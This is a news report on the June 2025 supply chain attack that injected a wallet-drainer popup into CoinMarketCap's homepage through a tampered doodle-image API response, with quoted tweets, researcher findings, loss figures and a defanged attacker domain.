CoinMarketCap, a leading platform for tracking cryptocurrency prices, recently experienced a significant cybersecurity breach involving a supply chain attack that compromised the safety of its website visitors. The incident exposed users to a wallet drainer campaign, resulting in stolen cryptocurrency from unsuspecting individuals who interacted with a malicious popup.
The issue began surfacing on the evening of June 20, 2025, when users visiting CoinMarketCap encountered unexpected Web3 prompts requesting wallet connections. While these popups appeared to be legitimate, they were actually part of a coordinated attack involving injected malicious scripts. Once users connected their wallets through the popup interface, their assets were covertly transferred to the attackers.
According to an official statement released by CoinMarketCap, the breach was traced to a vulnerability linked to the homepage’s animated doodle image. The company explained that the image contained a link which triggered unauthorized JavaScript code via an API call. This led to the popup appearing for some users upon visiting the homepage.
CoinMarketCap confirmed that its security team acted promptly upon discovering the issue. The malicious content was removed, the source of the problem identified, and a series of remediation measures were introduced to prevent future exploitation. The platform assured users that normal operations had resumed and that its systems were fully secure once again.
CoinMarketCap is hacked… you will get drained!pic.twitter.com/cwSFQ0M0rg
— Dark Web Informer – Cyber Threat Intelligence (@DarkWebInformer) June 20, 2025
Messages in "com"-related group chats revealed that a threat actor using the moniker "Spadle" is behind the CMC attack.
— Rey (@ReyXBF) June 21, 2025
Cybersecurity researchers at c/side later provided further technical insights into the breach. They stated that the attack was carried out by altering the JSON payload of the API responsible for displaying the doodle image. The altered data included a script tag that introduced a wallet-draining script sourced from an external domain named “static.cdnkit[.]io.” This script generated a convincing wallet connection popup using CoinMarketCap’s branding, tricking users into authorizing transactions that ultimately drained their crypto wallets.
On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected pop-up for some users when visited our homepage.…
— CoinMarketCap (@CoinMarketCap) June 21, 2025
🚨 Be aware of scammers!
🔹 CoinMarketCap will NEVER DM you first. If you receive a message claiming to be from CMC & asking for funds, it's a scam!
Always verify before sending out your funds!
Stay #SAFU
— CoinMarketCap (@CoinMarketCap) June 22, 2025
Analysts classified the breach as a supply chain attack, where the compromise occurred not on CoinMarketCap’s servers directly, but through a third-party service integrated into the platform. These types of attacks are notably difficult to detect because they exploit elements perceived as trusted within a system’s architecture.
Additional details about the breach emerged from a threat actor operating under the alias Rey. According to cybersecurity sources, the attacker disclosed information via a Telegram group, where they also shared a screenshot of the drainer panel. This dashboard indicated that approximately $43,266 worth of cryptocurrency was stolen from 110 victims during the incident. The attackers were reportedly communicating in French within the Telegram channel.
This breach highlights the rising threat of wallet drainers across the cryptocurrency ecosystem. Unlike traditional phishing scams, wallet-draining attacks are increasingly disseminated through social media, fake advertisements, spoofed websites, and browser extensions embedded with malicious scripts.
Recent data indicates that wallet drainer attacks were responsible for nearly $500 million in stolen assets throughout 2024, impacting over 300,000 wallet addresses. In response to the growing problem, platforms like Mozilla have begun deploying detection systems in their browser repositories to identify and block harmful wallet-draining extensions.
The CoinMarketCap incident underscores the urgency for platforms operating in the Web3 space to implement stronger safeguards against sophisticated attack vectors, particularly those involving third-party integrations. As decentralized technologies continue to expand, so too does the need for vigilant, multi-layered cybersecurity protocols.
